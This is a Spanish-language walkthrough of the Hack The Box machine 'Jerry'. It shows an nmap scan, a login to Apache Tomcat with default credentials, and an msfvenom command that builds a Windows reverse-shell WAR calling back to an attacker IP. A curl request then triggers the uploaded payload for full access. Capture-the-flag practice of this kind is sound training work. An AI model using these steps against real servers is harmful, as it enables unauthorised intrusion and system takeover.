Jerry es una máquina de dificultad Easy en la plataforma Hack The Box
En esta máquina, vamos a explotar una vulnerabilidad en el servicio Apache, que se encuentra disponible en el puerto 8080
Reconocimiento
Como siempre, utilizaremos la herramienta nmap para identificar los puertos abiertos en la máquina víctima:
1
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.10.95 -oG allPorts
En la máquina, esta abierto solamente el puerto 8080. Si introducimos la URL en el navegador junto con el puerto, podemos ver lo siguiente:
Podemos loguearnos en el servicio Apache Tomcat con las credenciales predeterminadas tomcat:s3cret:
Vemos que hay una sección donde podemos subir archivos .war , la cual usaremos para conseguir acceso al sistema:
Web Aplication Resource Files
Un archivo
WAR, es un formato de archivo utilizado para empaquetar y distribuir aplicaciones web en la plataforma Java. Contiene todos los recursos necesarios para ejecutar una aplicación web en un solo archivo comprimido.
Explotación
Utilizaremos la herramienta msfvenom para crear una reverse shell en windows y poder acceder mediante nc:
1
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.15 LPORT=443 -f war > rev_shell.war
Además, debemos saber el nombre del archivo .jsp para activarla con la herramienta curl. Para ello, utilizaremos jar para enumerar el contenido del archivo .war:
Ahora subiremos la reverse shell mediante la web utilizando curl, y nos pondremos en escucha en otra terminal mediante nc:
1
curl http://10.10.10.95:8000/rev_shell/mdeonxmbgy.jsp
De esta manera, ya tendremos acceso completo a la máquina víctima, donde podremos encontrar las flags en el Desktop del usuario administrator
Espero que os haya gustado y servido, cualquier comentario es de mucha ayuda. Adios!







